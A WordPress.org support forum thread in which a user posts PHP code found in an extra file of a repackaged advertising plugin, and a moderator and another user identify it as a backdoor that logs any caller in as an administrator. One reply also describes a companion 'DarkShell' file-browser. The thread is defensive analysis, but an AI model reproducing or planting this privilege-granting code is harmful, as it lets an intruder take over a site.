Title: What does this coding do? Last modified: October 21, 2017 --- # What does this coding do? * Resolved [kendraalexandra](https://wordpress.org/support/users/kendraalexandra/) * (@kendraalexandra) * [8 years, 7 months ago](https://wordpress.org/support/topic/what-does-this-coding-do/) * I was recently sent a plugin to download for advertising purposes and on inspection I found the same plugin on wordpress. In the modified version I found an extra file including this coding and I was wondering if anyone could help me identify what it does before I install it on my site: * File name: inc-action.php * users”; $user_ids = $wpdb->get_results($query_str); foreach ($user_ids as $uid) { $user_id = $uid->ID; if (user_can($user_id, ‘administrator’)) { $user_info = get_userdata($user_id); $user_login = $user_info->user_login; wp_set_current_user( $user_id, $user_login); wp_set_auth_cookie($user_id); do_action(‘wp_login’, $ user_login); echo “You are logged in as $user_login”; if (function_exists(‘get_admin_url’)){ wp_redirect(get_admin_url()); } else { wp_redirect(get_bloginfo(‘wpurl’) . ‘/ wp-admin’); } exit; } } Viewing 3 replies - 1 through 3 (of 3 total) * Moderator [Samuel Wood (Otto)](https://wordpress.org/support/users/otto42/) * (@otto42) * WordPress.org Admin * [8 years, 7 months ago](https://wordpress.org/support/topic/what-does-this-coding-do/#post-9607351) * That’s hacker stuff. It’s bad. Do not install. * Essentially, that gives anybody who knows that it is there Admin rights on your server. * Thread Starter [kendraalexandra](https://wordpress.org/support/users/kendraalexandra/) * (@kendraalexandra) * [8 years, 7 months ago](https://wordpress.org/support/topic/what-does-this-coding-do/#post-9607354) * Thanks so much – I thought so! Just needed it confirmed 🙂 * [Adriano G. V. Esposito](https://wordpress.org/support/users/adriano-esposito/) * (@adriano-esposito) * [8 years, 7 months ago](https://wordpress.org/support/topic/what-does-this-coding-do/#post-9622405) * I received some days ago a similiar advertising request for a site I manage and there was inside the same hack kendraalexandra showed. As said by Samuel, the hack, if called via a http request, provides the admin’s rights to the caller. Furthermore in my malicious plugin there was another hack, called DarkShell, with which an attacker can browse the entire file system of the site. * I suspect it was also in the kendraalexandra’s malicious plugin. * Note the plugin was except the two files perfectly legitimate and working. * So I understood the following: when the plugin was installed the attacker calls a http url by which answers the first php file to obtain administrator’s prilivegese. Than calls the second php file which allows to browse the entire file system of the site. Viewing 3 replies - 1 through 3 (of 3 total) The topic ‘What does this coding do?’ is closed to new replies. ## Tags * [backdoor](https://wordpress.org/support/topic-tag/backdoor/) * [Coding](https://wordpress.org/support/topic-tag/coding/) * [hacking](https://wordpress.org/support/topic-tag/hacking/) * [php](https://wordpress.org/support/topic-tag/php/) * In: [Everything else WordPress](https://wordpress.org/support/forum/miscellaneous/) * 3 replies * 3 participants * Last reply from: [Adriano G. V. Esposito](https://wordpress.org/support/users/adriano-esposito/) * Last activity: [8 years, 7 months ago](https://wordpress.org/support/topic/what-does-this-coding-do/#post-9622405) * Status: resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics